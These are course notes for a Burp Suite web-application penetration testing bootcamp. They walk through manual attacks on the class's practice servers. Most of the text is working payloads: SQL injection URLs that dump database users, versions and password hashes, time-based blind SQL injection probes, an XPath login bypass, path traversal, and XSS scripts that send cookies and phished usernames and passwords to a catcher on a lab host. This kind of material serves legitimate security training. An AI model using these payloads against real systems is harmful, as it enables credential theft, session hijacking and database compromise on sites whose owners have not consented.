#######################

# Burp Suite Bootcamp #

#######################

http://data.serviceplatform.org/wsdl_grabbing/seekda-wsdls.with_ini/36-CurrencyConvertor.wsdl

# Course Materials #

####################

https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/WebAppSecIsNotEasyButCanBeSimple.pptx

https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/Burp+Suite.pptx

Day 1 Video:

Day 1 Challenge (Due 12 December):

Use Burp Suite to demonstrate with screenshots and explanations of how to test for the all of the OWASP Top 10 vulnerabilities against your choice of targets the following targets:

http://strategicsec.com

http://54.149.82.150/ 

http://54.186.248.116/

http://54.200.178.220/

http://54.213.131.105/

Day 2 Video:

https://s3.amazonaws.com/StrategicSec-Videos/2015/2015-12-13+09.25+Burp+Suite+Weekend+Bootcamp.mp4

Day 2 Challenge (Due 19 December):

----------------------------------

Use the StrategicSec Ubuntu VM to demonstrate how to install, configure, and use at least five (5) of the following Burp Suite extensions from these websites and lists below: 

https://github.com/integrissecurity/carbonator

https://github.com/allfro/BurpKit

https://github.com/nccgroup/BurpSuiteLoggerPlusPlus

https://github.com/Quitten/Autorize

https://github.com/codewatchorg/sqlipy

https://github.com/augustd/burp-suite-token-fetcher

https://github.com/augustd/burp-suite-gwt-scan

https://webbreacher.wordpress.com/2015/07/25/my-favorite-burp-suite-extensions/

http://bughunting.guide/the-top-5-burp-suite-extensions/

https://www.codemagi.com/downloads/

http://54.149.82.150/ 

http://54.186.248.116/

http://54.200.178.220/

http://54.213.131.105/

Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Burp-Suite-Bootcamp-Day2-Challenge.docx)

##########

# VMWare #

##########

- For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.

- A 30-day trial of Workstation 11 can be downloaded from here:

- https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0

- A 30-day trial of Fusion 7 can be downloaded from here:

- https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_fusion/7_0

- The newest version of VMWare Player can be downloaded from here:

- https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0

- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.

https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip

user: strategicsec

pass: strategicsec

##################################

# Basic: Web Application Testing #

##################################

Most people are going to tell you reference the OWASP Testing guide.

https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.

The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.

	1. Does the website talk to a DB?

		- Look for parameter passing (ex: site.com/page.php?id=4)

		- If yes - try SQL Injection

	2. Can I or someone else see what I type?

		- If yes - try XSS

		- If yes - try LFI/RFI

Let's start with some manual testing against 54.149.82.150

Start here:

http://54.149.82.150/

There's no parameter passing on the home page so the answer to question 1 is NO.

There is however a search box in the top right of the webpage, so the answer to question 2 is YES.

Try an XSS in the search box on the home page:

Doing this gives us the following in the address bar:

http://54.149.82.150/BasicSearch.aspx?Word=<script>alert(123);</script>

Ok, so we've verified that there is XSS in the search box. 

Let's move on to the search box in the left of the page.

Moving on to the login page.

http://54.149.82.150/login.aspx

I entered a single quote (') for both the user name and the password. I got the following error:

-----------------------------------------------------------------

 'Users//User[@Name=''' and @Password=''']' has an invalid token.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token.

Source Error:

Line 112:            doc.Load(Server.MapPath("") + @"\AuthInfo.xml");

Line 113:            string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']";

Line 114:            XmlNodeList xmln = doc.SelectNodes(credential);

Line 115:            //String test = xmln.ToString();            

Line 116:            if (xmln.Count > 0)

-----------------------------------------------------------------

Hmm....System.Xml.XPath.XPathException.....that's not SQL.

WTF is this:

Line 112:            doc.Load(Server.MapPath("") + @"\AuthInfo.xml");

In this case you'll have the trap the request with a proxy like:

- Firefox Tamper Data

- Burp Suite				http://www.portswigger.net/Burp/proxy.html

- WebScarab				https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

- Rat Proxy				https://code.google.com/p/ratproxy/

- Zap Proxy				https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

- Paros					http://sourceforge.net/projects/paros/

Let's go back to that page error message.....

Let's check it out:

http://54.149.82.150/AuthInfo.xml

Looks like we found passwords!!!!!!!!!!

Looks like there no significant new functionality after logging in with the stolen credentials.

http://54.149.82.150/bookdetail.aspx?id=2

Ok, there is parameter passing (bookdetail.aspx?id=2).

The page name is:		bookdetail.aspx

The parameter name is:		id

The paramber value is:		2

Let's try throwing a single quote (') in there:

http://54.149.82.150/bookdetail.aspx?id=2'

I get the following error:

Unclosed quotation mark after the character string ''.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.

#############################################################################

# SQL Injection                                                             #

# https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #

#############################################################################

- Another quick way to test for SQLI is to remove the paramter value

http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--

http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--

http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--

http://54.149.82.150/bookdetail.aspx?id=2 order by 8--

http://54.149.82.150/bookdetail.aspx?id=2 order by 9--

http://54.149.82.150/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--

	We are using a union select statement because we are joining the developer's query with one of our own.

	Reference: 

	http://www.techonthenet.com/sql/union.php

	The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements. 

	It removes duplicate rows between the various SELECT statements.

	Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--

http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--

http://54.149.82.150/bookdetail.aspx?id=(2)	

http://54.149.82.150/bookdetail.aspx?id=(4-2)	

http://54.149.82.150/bookdetail.aspx?id=(4-1)

http://54.149.82.150/bookdetail.aspx?id=2 or 1<>1# 

http://54.149.82.150/bookdetail.aspx?id=2 or 2 != 3-- 

http://54.149.82.150/bookdetail.aspx?id=2 &0#

###############################

# Blind SQL Injection Testing #

###############################

http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--

http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--

Let's go for a quick check to see if it's DBO

http://54.149.82.150/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--

http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--

http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--

B - 2nd Character

http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--  	Ok, good it waited for 10 seconds

http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'--  	Ok, good it waited for 10 seconds

http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--

http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--  	Ok, good it waited for 10 seconds

###################################################################

# What is XSS                                                     #

# https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #

###################################################################

OK - what is Cross Site Scripting (XSS)

1. Use Firefox to browse to the following location:

	http://54.186.248.116/xss_practice/

	A really simple search page that is vulnerable should come up. 

2. In the search box type:

	<script>alert('So this is XSS')</script>

	This should pop-up an alert window with your message in it proving XSS is in fact possible.

	Ok, click OK and then click back and go back to http://54.186.248.116/xss_practice/

3. In the search box type:

	<script>alert(document.cookie)</script>

	This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.

	Ok, click OK and then click back and go back to http://54.186.248.116/xss_practice/

4. Now replace that alert script with:

	<script>document.location="http://54.186.248.116/xss_practice/cookie_catcher.php?c="+document.cookie</script> 

This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.

5. Now view the stolen cookie at:

	http://54.186.248.116/xss_practice/cookie_stealer_logs.html

The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.

############################

# A Better Way To Demo XSS #

############################

Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.

Use Firefox to browse to the following location:

	http://54.186.248.116/xss_practice/

Paste this in the search box

----------------------------

Option 1

--------

<script>

password=prompt('Your session is expired. Please enter your password to continue',' '); 

document.write("<img src=\"http://54.186.248.116/xss_practice/passwordgrabber.php?password=" +password+"\">");

</script>

Now view the stolen cookie at:

	http://54.186.248.116/xss_practice/passwords.html

Option 2

--------

username=prompt('Please enter your username',' ');

password=prompt('Please enter your password',' ');

document.write("<img src=\"http://54.186.248.116/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");

</script>

Now view the stolen cookie at:

http://54.186.248.116/xss_practice/username_password_logs.html

#########################################

# Let's kick it up a notch with ASP.NET #

# http://54.200.178.220/                #

#########################################

The trading Web App is on http://54.200.178.220/

Try the following in the search box:

	<script>alert(123);</script>

	' or 1=1

	' and a=a

	1=1

	Joe'+OR+1=1;--

	<script>alert(123);</script>

Open a new tab in firefox and try this:

	http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName

Try the contact us form.

Open a new tab in firefox and try this:

	http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini

Try this on the inquiry form:

	Joe McCray

	1234567890

	joe@strategicsec.com') waitfor delay '00:00:10'--

Login Box:

	' or 1=1 or ''='

	anything   			(click login instead of pressing enter)

Tamper Data: (notice 2 session IDs)

	IsAdmin=yes; 

	ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45

	Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n

	joe|set

	<script>alert(123);</script>

############################

	<script>alert(123);</script

	<script>alert(123)

	<script>

	<scrip

	<scri

	<sc

	<s

	<

	< s

	Joe'+OR+1=1;--

	http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName

	<script>alert(123);</script>

	' or 1=1 or ''='

	anything

#########################

#########################

	- Click the "Options" sub tab

	- In the “Edit proxy listener” pop up select “Binding Tab” select “loopback only”

	- In the same pop up select the “Certificate” tab

Open Firefox

	- Click "Edit"

	- Click “Preferences"

	- Click the "Advanced" tab

	- Click the "Network" sub tab

	- Click the connection "settings" button

Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.

Click "Get Certificate", then click "View".

In the “Details” tab, select the root certificate in the tree (PortSwigger CA).

Click “Advanced” and go to “Certificates” tab

Click “View Certificates”